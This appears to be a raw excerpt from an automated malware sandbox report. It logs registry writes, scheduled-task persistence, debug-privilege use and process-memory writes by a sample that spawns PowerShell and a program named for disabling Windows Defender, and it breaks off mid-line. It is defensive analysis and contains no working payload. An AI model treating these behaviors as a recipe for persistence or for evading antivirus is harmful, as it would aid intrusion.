616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37303061343435383135626634363336623564663734326335343866386234613462383333396464623366353464653030323237346537656361383137346365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783da5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783da5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000beb7a71c20c9db01b515071d20c9db01b515071d20c9db01573e0a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000353463376632343763306165653737326465366266313638393264623736363437373266666635383739626533656136383263373034353262633833656632630000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000006e089500350034006300370066003200340037006300300061006500650037003700320064006500360062006600310036003800390032006400620037003600360034003700370032006600660066003500380037003900620065003300650061003600380032006300370030003400350032006200630038003300650066003200630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35346337663234376330616565373732646536626631363839326462373636343737326666663538373962653365613638326337303435326263383365663263000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783aa5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783aa5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = 59f1241d20c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009258671c20c9db019258671c20c9db019258671c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000353463376632343763306165653737326465366266313638393264623736363437373266666635383739626533656136383263373034353262633833656632630000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000006e089500350034006300370066003200340037006300300061006500650037003700320064006500360062006600310036003800390032006400620037003600360034003700370032006600660066003500380037003900620065003300650061003600380032006300370030003400350032006200630038003300650066003200630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35346337663234376330616565373732646536626631363839326462373636343737326666663538373962653365613638326337303435326263383365663263000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87838a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87838a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7f052b6b4f6124261ae69a2f87905a90b231eb929a80c0f170d9d24b443af148" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7f052b6b4f6124261ae69a2f87905a90b231eb929a80c0f170d9d24b443af148" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d9b2767360708420e74d29e3d125ef9b042b19fbb3ab038528a08c810e868c1a" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000336a991c20c9db0110c5361d20c9db0110c5361d20c9db01e7600c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000643962323736373336303730383432306537346432396533643132356566396230343262313966626233616230333835323861303863383130653836386331610000b20009000400efbeb45a5905b45a59052e00000000000000000000000000000000000000000000000000bccb9900640039006200320037003600370033003600300037003000380034003200300065003700340064003200390065003300640031003200350065006600390062003000340032006200310039006600620062003300610062003000330038003500320038006100300038006300380031003000650038003600380063003100610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64396232373637333630373038343230653734643239653364313235656639623034326231396662623361623033383532386130386338313065383638633161000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783ca5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783ca5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5584 schtasks.exe 4724 schtasks.exe 516 schtasks.exe 3996 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1008 x69.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3000 powershell.exe 3000 powershell.exe 2472 powershell.exe 2472 powershell.exe 2472 powershell.exe 3268 powershell.exe 3268 powershell.exe 3268 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 4852 powershell.exe 4852 powershell.exe 4852 powershell.exe 5452 powershell.exe 5452 powershell.exe 5452 powershell.exe 3720 powershell.exe 3720 powershell.exe 3720 powershell.exe 4704 powershell.exe 4704 powershell.exe 3700 powershell.exe 3700 powershell.exe 4704 powershell.exe 3700 powershell.exe 2508 powershell.exe 2508 powershell.exe 1276 powershell.exe 1276 powershell.exe 2508 powershell.exe 5244 powershell.exe 5244 powershell.exe 1276 powershell.exe 5244 powershell.exe 5888 powershell.exe 5888 powershell.exe 2896 powershell.exe 2896 powershell.exe 5888 powershell.exe 2896 powershell.exe 1596 powershell.exe 1596 powershell.exe 1596 powershell.exe 5772 powershell.exe 5772 powershell.exe 5772 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 1576 powershell.exe 1576 powershell.exe 1576 powershell.exe 4992 powershell.exe 4992 powershell.exe 4992 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 2900 powershell.exe 2900 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3544 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5408 250519-z3llfszks4.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 1008 x69.exe Token: SeDebugPrivilege 928 x69.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 5452 powershell.exe Token: SeDebugPrivilege 3720 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 3700 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 5244 powershell.exe Token: SeDebugPrivilege 5888 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 5772 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 1008 x69.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 2900 powershell.exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeDebugPrivilege 5904 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 5232 powershell.EXE Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 5300 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 5664 powershell.exe Token: SeDebugPrivilege 4048 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 5240 powershell.exe Token: SeDebugPrivilege 5584 powershell.exe Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 3744 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 4828 powershell.EXE Token: SeDebugPrivilege 5232 powershell.EXE Token: SeDebugPrivilege 4828 powershell.EXE Token: SeDebugPrivilege 4480 dllhost.exe Token: SeDebugPrivilege 5088 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2188 svchost.exe Token: SeIncreaseQuotaPrivilege 2188 svchost.exe Token: SeSecurityPrivilege 2188 svchost.exe Token: SeTakeOwnershipPrivilege 2188 svchost.exe Token: SeLoadDriverPrivilege 2188 svchost.exe Token: SeSystemtimePrivilege 2188 svchost.exe Token: SeBackupPrivilege 2188 svchost.exe Token: SeRestorePrivilege 2188 svchost.exe Token: SeShutdownPrivilege 2188 svchost.exe Token: SeSystemEnvironmentPrivilege 2188 svchost.exe Token: SeUndockPrivilege 2188 svchost.exe Token: SeManageVolumePrivilege 2188 svchost.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3544 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5408 wrote to memory of 3000 5408 250519-z3llfszks4.exe 95 PID 5408 wrote to memory of 3000 5408 250519-z3llfszks4.exe 95 PID 5408 wrote to memory of 516 5408 250519-z3llfszks4.exe 99 PID 5408 wrote to memory of 516 5408 250519-z3llfszks4.exe 99 PID 1520 wrote to memory of 1008 1520 cmd.exe 104 PID 1520 wrote to memory of 1008 1520 cmd.exe 104 PID 5408 wrote to memory of 928 5408 250519-z3llfszks4.exe 105 PID 5408 wrote to memory of 928 5408 250519-z3llfszks4.exe 105 PID 5408 wrote to memory of 2472 5408 250519-z3llfszks4.exe 106 PID 5408 wrote to memory of 2472 5408 250519-z3llfszks4.exe 106 PID 5408 wrote to memory of 3996 5408 250519-z3llfszks4.exe 108 PID 5408 wrote to memory of 3996 5408 250519-z3llfszks4.exe 108 PID 5408 wrote to memory of 5740 5408 250519-z3llfszks4.exe 112 PID 5408 wrote to memory of 5740 5408 250519-z3llfszks4.exe 112 PID 5408 wrote to memory of 5740 5408 250519-z3llfszks4.exe 112 PID 5408 wrote to memory of 3268 5408 250519-z3llfszks4.exe 113 PID 5408 wrote to memory of 3268 5408 250519-z3llfszks4.exe 113 PID 3576 wrote to memory of 4844 3576 cmd.exe 115 PID 3576 wrote to memory of 4844 3576 cmd.exe 115 PID 3576 wrote to memory of 4844 3576 cmd.exe 115 PID 5740 wrote to memory of 2700 5740 x69Disable-winDefender.exe 116 PID 5740 wrote to memory of 2700 5740 x69Disable-winDefender.exe 116 PID 5740 wrote to memory of 2700 5740 x69Disable-winDefender.exe 116 PID 4844 wrote 